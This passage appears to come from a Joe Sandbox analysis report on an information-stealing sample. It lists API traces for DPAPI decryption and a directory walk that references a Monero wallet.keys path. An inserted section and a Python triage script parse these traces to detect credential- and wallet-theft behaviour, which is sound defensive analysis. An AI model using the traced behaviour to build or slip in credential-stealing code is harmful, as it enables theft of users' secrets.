                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008AEA98,00000000,?,00F20E10,00000000,?,00000000,00000000), ref: 00F17A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F17A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008AEA98,00000000,?,00F20E10,00000000,?,00000000,00000000,?), ref: 00F17A7D
                        • wsprintfA.USER32 ref: 00F17AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: db804bd6eb1ed4e4a7d75e657aec95771a4c001dbed4cb61baef0e27f2333edc
                        • Instruction ID: 3f276c77b2831b62e8c33b6474fea6271bdb10dfe121cfb301e22bbc13840f72
                        • Opcode Fuzzy Hash: db804bd6eb1ed4e4a7d75e657aec95771a4c001dbed4cb61baef0e27f2333edc
                        • Instruction Fuzzy Hash: FD1182B1945228DBEB24DB54DC45F99B778FB44721F1043A5E51A932C0C7745A80DF51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 7ZA$!u$S:{
                        • API String ID: 0-260234434
                        • Opcode ID: f4854feb95417d41d077ee4da97a54914d403544b0f7657f51615388c36d67d3
                        • Instruction ID: ce01bd26eb21a1e5c6b31c9f3af83067d3a7ab732768c43d5a7ed4dcb3bce2a9
                        • Opcode Fuzzy Hash: f4854feb95417d41d077ee4da97a54914d403544b0f7657f51615388c36d67d3
                        • Instruction Fuzzy Hash: E2B2E5F3A0C2049FE304AE29DC8567AFBE5EF94720F1A493DE6C5C3744EA3598058697
                        APIs
                        • CoCreateInstance.COMBASE(00F1E118,00000000,00000001,00F1E108,00000000), ref: 00F13758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00F137B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: af75902474b998e726421b0fbd3b6680261cbd085595fbecd0e764b79dc8893d
                        • Instruction ID: d76c4b8b0b3c9eaecc5c18277516d64b235dc12fc7e7fedf37d22049bde3882e
                        • Opcode Fuzzy Hash: af75902474b998e726421b0fbd3b6680261cbd085595fbecd0e764b79dc8893d
                        • Instruction Fuzzy Hash: 4E410671A40A28AFDB24DB58CC94BDBB7B4BB48702F4041D8E609A72D0E771AEC5CF50
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F09B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F09BA3
                        • LocalFree.KERNEL32(?), ref: 00F09BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 203d264517af044a038ee6cff18877e4d55a1367f0a298b66193644ee7926d63
                        • Instruction ID: 7849885e10ff62bc1ba7675976dad0802db927bd2c1b501b50ad91d7651c8ca0
                        • Opcode Fuzzy Hash: 203d264517af044a038ee6cff18877e4d55a1367f0a298b66193644ee7926d63
                        • Instruction Fuzzy Hash: C8110CB8A00209EFDB04DF94D985AAE77B5FF88700F104568E81597384D774AE50CF61
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: iakm$@/_
                        • API String ID: 0-3554580638
                        • Opcode ID: 9ced6500eb433c0876decb07a35e8af1a9f08e4f7c715e6a27b5778b83f7f8dc
                        • Instruction ID: 0bdd2dc27dfb6b134f48f134537dcc06c0f10b01b89cbfa7ba3e4e9de0990eaf
                        • Opcode Fuzzy Hash: 9ced6500eb433c0876decb07a35e8af1a9f08e4f7c715e6a27b5778b83f7f8dc
                        • Instruction Fuzzy Hash: DEB22BF3A0C2049FE3046E2DEC8577ABBE9EBD4320F1A493DEAC5C7744E63558058696
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F215B8,00F20D96), ref: 00F0F71E
                        • StrCmpCA.SHLWAPI(?,00F215BC), ref: 00F0F76F
                        • StrCmpCA.SHLWAPI(?,00F215C0), ref: 00F0F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0FAB1
                        • FindClose.KERNEL32(000000FF), ref: 00F0FAC3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: c19a005c7c07037de24dbfc9fa304fcb766ce1a542c07603fee7310fcc33b9d6
                        • Instruction ID: bcabebe41a976f7511cb76cc7e5b815def640e0da7eae577e478326431474899
                        • Opcode Fuzzy Hash: c19a005c7c07037de24dbfc9fa304fcb766ce1a542c07603fee7310fcc33b9d6
                        • Instruction Fuzzy Hash: 3D11963580115D9BDB24FBB0ED559ED7378AF10320F4042A9A51A574D2EF382B8AEB92
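The two "APIs" lists above (the CryptUnprotectData / LocalAlloc / LocalFree routine at 00F09B84, and the FindFirstFileA / FindNextFileA / FindClose routine whose lstrlen subcall references \Monero\wallet.keys) are the kind of evidence an analyst pulls out of a Joe Sandbox execution graph by hand. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses bullet lines in the exact format shown on this page into call records and flags three behaviours, DPAPI decryption (CryptUnprotectData is the DPAPI decrypt entry point), an ordered FindFirstFile/FindNextFile directory walk, and wallet-related strings in call arguments. The sample input is constructed by copying those two lists; the behaviour labels and the order check are my own assumptions, and the page does not show what data the DPAPI call decrypts.

```python
"""Triage helper for the per-function "APIs" lists of a Joe Sandbox report.

Added example: parses the bullet lines into call records and labels
stealer behaviours that are visible in the call sequence alone.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: the two API lists copied from the report entries
# above.  Raw strings keep the backslash path literal.
SAMPLE_ENTRIES = {
    "dpapi_routine": r"""
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F09B84
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00F09BA3
• LocalFree.KERNEL32(?), ref: 00F09BD3
""",
    "walk_routine": r"""
  • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
  • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
  • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
  • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
  • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
  • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
  • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F215B8,00F20D96), ref: 00F0F71E
• StrCmpCA.SHLWAPI(?,00F215BC), ref: 00F0F76F
• StrCmpCA.SHLWAPI(?,00F215C0), ref: 00F0F785
• FindNextFileA.KERNEL32(000000FF,?), ref: 00F0FAB1
• FindClose.KERNEL32(000000FF), ref: 00F0FAC3
""",
}

# One bullet line: optional "Part of subcall function ADDR:" prefix, then
# API.MODULE(args), ref: ADDR.  Addresses on the page are upper-case hex.
CALL_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int                 # call-site address in the dumped image
    subcall: Optional[int]   # callee address when the call is reported via a subroutine


def parse_api_list(text: str) -> list:
    """Turn the bullet lines of one 'APIs' section into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:  # blank lines and headings
            continue
        calls.append(ApiCall(
            api=m["api"],
            module=m["mod"],
            args=[a for a in m["args"].split(",") if a],
            ref=int(m["ref"], 16),
            subcall=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def triage(text: str) -> dict:
    """Map behaviour labels (assumed names) to the evidence behind them."""
    calls = parse_api_list(text)
    direct = [c for c in calls if c.subcall is None]
    names = [c.api for c in direct]
    findings = {}

    # CryptUnprotectData only succeeds in the context of the user who protected
    # the data, which is why stealers call it in-process; LocalAlloc/LocalFree
    # around it is the output-blob handling.
    dpapi = [hex(c.ref) for c in direct if c.api == "CryptUnprotectData"]
    if dpapi:
        findings["dpapi_decrypt"] = dpapi

    # A walk needs FindFirstFile before FindNextFile; checking the order avoids
    # flagging a lone FindFirstFile existence probe.
    first = [i for i, n in enumerate(names) if n.startswith("FindFirstFile")]
    nxt = [i for i, n in enumerate(names) if n.startswith("FindNextFile")]
    if first and nxt and first[0] < nxt[-1]:
        findings["directory_walk"] = [hex(direct[first[0]].ref), hex(direct[nxt[-1]].ref)]

    # Wallet artefacts often surface only in subcall arguments (here lstrlen),
    # so every call is scanned, not just the direct ones.
    wallet = [a for c in calls for a in c.args if "wallet" in a.lower()]
    if wallet:
        findings["wallet_path_string"] = wallet
    return findings


if __name__ == "__main__":
    for name, text in SAMPLE_ENTRIES.items():
        print(name, triage(text))
```

Run against the two constructed entries, the DPAPI routine is labelled dpapi_decrypt with its call site, and the walk routine is labelled directory_walk plus wallet_path_string with the \Monero\wallet.keys argument; the StrCmpCA calls are kept in the record but not interpreted, because the page shows only the addresses of the strings they compare against, not their contents.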
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: C85
                        • API String ID: 0-414140983
                        • Opcode ID: a00c9b5b53c9fcef6794fe7472e5cc5372b1d546ae2382c8cb80cc595a030f09
                        • Instruction ID: fcb4ebd9dad46397303ac9f1189e9d724fbd8a05fb3e9cf11276960f03b96a04
                        • Opcode Fuzzy Hash: a00c9b5b53c9fcef6794fe7472e5cc5372b1d546ae2382c8cb80cc595a030f09
                        • Instruction Fuzzy Hash: 305107F3E192109FF3046E39DC8476AB7E6EB94320F2B4A3DD9C897780E57948458782
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: >9'<
                        • API String ID: 0-4020256883
                        • Opcode ID: f50c3dcde1ce2e9aa221eebdbcafa234a48d5785b82232e777bcb4082446d06d
                        • Instruction ID: c12524154840efbd749d0fc4b155de552c9631e5d2c7b39537a11a0e4f6a9190
                        • Opcode Fuzzy Hash: f50c3dcde1ce2e9aa221eebdbcafa234a48d5785b82232e777bcb4082446d06d
                        • Instruction Fuzzy Hash: 7351F3B39097189FE3046F19DC8177ABBE5EF54320F16493EE6C987380EA355851CB86
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: kD?~
                        • API String ID: 0-1435761669
                        • Opcode ID: dbdab817e47fe2076be42835a31b27f367e40341edb87d2d02ada058d792aaa9
                        • Instruction ID: 4def62d3f5a94278bd2faa33dc52b2b89b00fa42ca7fe69654524318f6e03e97
                        • Opcode Fuzzy Hash: dbdab817e47fe2076be42835a31b27f367e40341edb87d2d02ada058d792aaa9
                        • Instruction Fuzzy Hash: 8251F2B3A083149FE3046E29EC8477AF7E5EB90710F1A493DD9C997780DA395C458B86
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: +."Q
                        • API String ID: 0-3749362571
                        • Opcode ID: b510368a1c274d0378df4688fc5e664070b75281f5660bbb491477bf278022b8
                        • Instruction ID: abed2fe82ca743c2fa6da068aa8e6ef926213545e514c4369ab21ed987cbffc6
                        • Opcode Fuzzy Hash: b510368a1c274d0378df4688fc5e664070b75281f5660bbb491477bf278022b8
                        • Instruction Fuzzy Hash: 1541D4B660D708CBD308AE29D89547EF7E9EF94714F06493EE6C687E44FE3058418A43
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: o"~~
                        • API String ID: 0-2143920772
                        • Opcode ID: 6a3f6ebc9b9dd4ecd17243327f46a12a0168c965d0ab011ead603bebd0a72666
                        • Instruction ID: da9215b74a130063e67e4c6fa75e14053ff7adb843ad808e73ca648ad2c9481f
                        • Opcode Fuzzy Hash: 6a3f6ebc9b9dd4ecd17243327f46a12a0168c965d0ab011ead603bebd0a72666
                        • Instruction Fuzzy Hash: D1317CB250C604AFE305BE2ADC416AEFBE6FFD8310F16892DE2D583614EA305440CA87
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: w//
                        • API String ID: 0-3274472087
                        • Opcode ID: 8eb69b7d9dde8649d2c1a80b0c151f118e379af701f2bf51fa1ca5b556be9819
                        • Instruction ID: 0d2d73bbf07e0f823a10d089f0c490cc570a0f7d18652eccf7f6ecef9b36550c
                        • Opcode Fuzzy Hash: 8eb69b7d9dde8649d2c1a80b0c151f118e379af701f2bf51fa1ca5b556be9819
                        • Instruction Fuzzy Hash: 9B218DB290C2089FE715BE19DC4176EF7E5EFA8310F16892CEBD043350FA3168249A87
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
